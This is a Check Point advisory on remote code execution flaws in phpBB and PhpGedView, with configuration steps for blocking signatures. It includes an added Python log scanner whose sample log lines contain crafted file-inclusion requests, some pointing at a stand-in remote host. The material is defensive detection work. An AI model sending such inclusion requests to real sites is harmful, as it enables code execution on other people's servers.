
Update Protection against phpBB and PHPGedView Remote Execution Vulnerabilities


Check Point Reference: CPAI-2006-005
Date Published:
Severity:
Last Updated:
Source: SANS
Security Tracker Alert ID: 1015395
Industry Reference(s): CVE-2005-4468
Protection Provided by: VPN-1
  • NGX R60
  • NG with Application Intelligence R55W
  • NG with Application Intelligence R55
  • NG with Application Intelligence R54
InterSpect
  • NGX
  • 2.0 and 1.x
Who is Vulnerable?
phpBB version 2.0.17 and prior
PhpGedView 2.x and 3.x
Vulnerability Description
phpBB is a widely used bulletin board software package. PhpGedView is a genealogy program which allows for genealogy viewing and editing on the Web. Several vulnerabilities reported in phpBB and in PhpGedView could allow an attacker to execute arbitrary PHP code.

Vulnerability Details
PhpGedView vulnerability: The 'help_text_vars.php' script does not properly validate user-supplied input in the 'PGV_BASE_DIRECTORY' parameter. A remote attacker can supply a specially crafted URL to execute arbitrary code on the target system.

phpBB vulnerability: Input passed to the "phpbb_root_path" parameter in "admin_styles.php" is not properly sanitized prior to being used to include files. This can be exploited to include arbitrary files from external resources.
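
The following is an added example, not part of the original advisory or any Check Point product: a log triage script that flags web server requests supplying either parameter named above and marks those whose value points at an external resource. The access log format, the sample lines, the host name remote.example and the verdict labels are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Script -> parameter pairs named in this advisory.
WATCHED = {
    "admin_styles.php": "phpbb_root_path",
    "help_text_vars.php": "PGV_BASE_DIRECTORY",
}
# Assumed log format: Apache common/combined access log.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value that names a remote resource (scheme://host or //host).
REMOTE_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:)?//", re.I)

# Constructed sample lines (documentation addresses and host names only).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2006:10:00:00 +0000] "GET /forum/index.php HTTP/1.1" 200 512',
    '192.0.2.44 - - [01/Jan/2006:10:00:05 +0000] "GET /forum/admin/admin_styles.php?phpbb_root_path=http%3A%2F%2Fremote.example%2F HTTP/1.1" 200 90',
    '192.0.2.45 - - [01/Jan/2006:10:00:09 +0000] "GET /pgv/help_text_vars.php?PGV_BASE_DIRECTORY=%252F%252Fremote.example%252F HTTP/1.0" 200 90',
    '192.0.2.46 - - [01/Jan/2006:10:00:12 +0000] "GET /pgv/help_text_vars.php?PGV_BASE_DIRECTORY=./ HTTP/1.1" 200 90',
]

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so double-encoded values are still seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return (client, script, parameter, verdict) for a watched request, else None."""
    match = REQUEST_RE.match(line)
    if not match:
        return None
    client, target = match.groups()
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1].lower()
    wanted = WATCHED.get(script)  # None when the script is not one we watch
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name == wanted:
            remote = REMOTE_RE.match(fully_decode(value))
            return client, script, name, "remote-value" if remote else "local-value"
    return None

def scan(lines):
    """Return one hit per log line that supplies a watched parameter."""
    return [hit for hit in map(classify, lines) if hit]
```

Access logs record only the request line, so a parameter sent in a POST body is not visible to this check; the gateway signatures described below inspect the traffic itself.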

Protection Overview
The update enables the HTTP Worm Catcher to detect and block attempts to exploit these vulnerabilities, based on pre-defined worm signatures.

To configure the defense, select your product from the list below and follow the related protection steps.

Additional Information
The update also includes the following protections:

  • Enhancement to the Google Talk protection (CPAI-2005-151)
  • CIFS Brute Force Attacks protection (CPSA-2006-01)

VPN-1 NGX R60

How Can I Protect My Network?
Users of VPN-1 NGX R60 should update their SmartDefense by clicking Online Update in the SmartDashboard General window.

To enable the protection:

1. On the Web Intelligence tree, click Malicious Code > General HTTP Worm Catcher.
2. Enable the following patterns:
Generic phpBB remote execution arbitrary commands
PHPGedView Remote Execution Arbitrary Commands 
3. Install policy on all modules.

How Do I Know if My Network is Under Attack?
SmartView Tracker will log the following entries:

Attack Name: HTTP Worm Catcher
Attack Information:
Generic phpBB remote execution arbitrary commands
PHPGedView Remote Execution Arbitrary Commands 

InterSpect NGX

How Can I Protect My Network?
Users of InterSpect NGX should update their systems by selecting Profiles > SmartDefense Service and clicking Online Update.

To enable the protection:

1. In the left pane, select Profiles > Default Protection and select the Web Intelligence page of the profile.
2. In the Web Intelligence tree, click Malicious Code > General HTTP Worm Catcher.
3. Enable the following patterns:
Generic phpBB remote execution arbitrary commands
PHPGedView Remote Execution Arbitrary Commands
4. Install policy on all modules.

How Do I Know if My Network is Under Attack?
SmartView Tracker will log the following entries:

Attack Name: HTTP Worm Catcher
Attack Information:
Generic phpBB remote execution arbitrary commands
PHPGedView Remote Execution Arbitrary Commands

VPN-1 NG with Application Intelligence R55W

How Can I Protect My Network?
Users of VPN-1 NG with Application Intelligence R55W should update their SmartDefense by clicking Online Update in the SmartDashboard General window.

To enable the protection:

1. On the Web Intelligence tree, click Malicious Code > General HTTP Worm Catcher.
2. Enable the following patterns:
Generic phpBB remote execution arbitrary commands
PHPGedView Remote Execution Arbitrary Commands

3. Install policy on all modules.

How Do I Know if My Network is Under Attack?
SmartView Tracker will log the following entries:

Attack Name: HTTP Worm Catcher
Attack Information:
Generic phpBB remote execution arbitrary commands
PHPGedView Remote Execution Arbitrary Commands

VPN-1 NG with Application Intelligence R55/R54

How Can I Protect My Network?
Users of VPN-1 NG with Application Intelligence R55/R54 should update their SmartDefense by clicking Update Now in the SmartDashboard General window.

To enable the protection:

1. On the SmartDefense tree, click Application Intelligence > Web and enable General HTTP Worm Catcher.
2. Enable the following patterns:
Generic phpBB remote execution arbitrary commands
PHPGedView Remote Execution Arbitrary Commands 
3. Install security policy on all modules.

How Do I Know if My Network is Under Attack?
SmartView Tracker will log the following entries:

Attack Name: HTTP Worm Catcher
Attack Information:
Generic phpBB remote execution arbitrary commands
PHPGedView Remote Execution Arbitrary Commands 

InterSpect 2.0, 1.x

How Can I Protect My Network?
Users of InterSpect 2.0, 1.x should update their SmartDefense by clicking Online Update in the SmartDashboard General window.

To enable the protection:

1. On the SmartDefense tree, click Malicious Code > General HTTP Worm Defender.
2. Enable the following patterns:
Generic phpBB remote execution arbitrary commands
PHPGedView Remote Execution Arbitrary Commands
3. Install policy on all modules.

How Do I Know if My Network is Under Attack?
SmartView Tracker will log the following entries:

Attack Name: HTTP Worm Catcher
Attack Information:
Generic phpBB remote execution arbitrary commands
PHPGedView Remote Execution Arbitrary Commands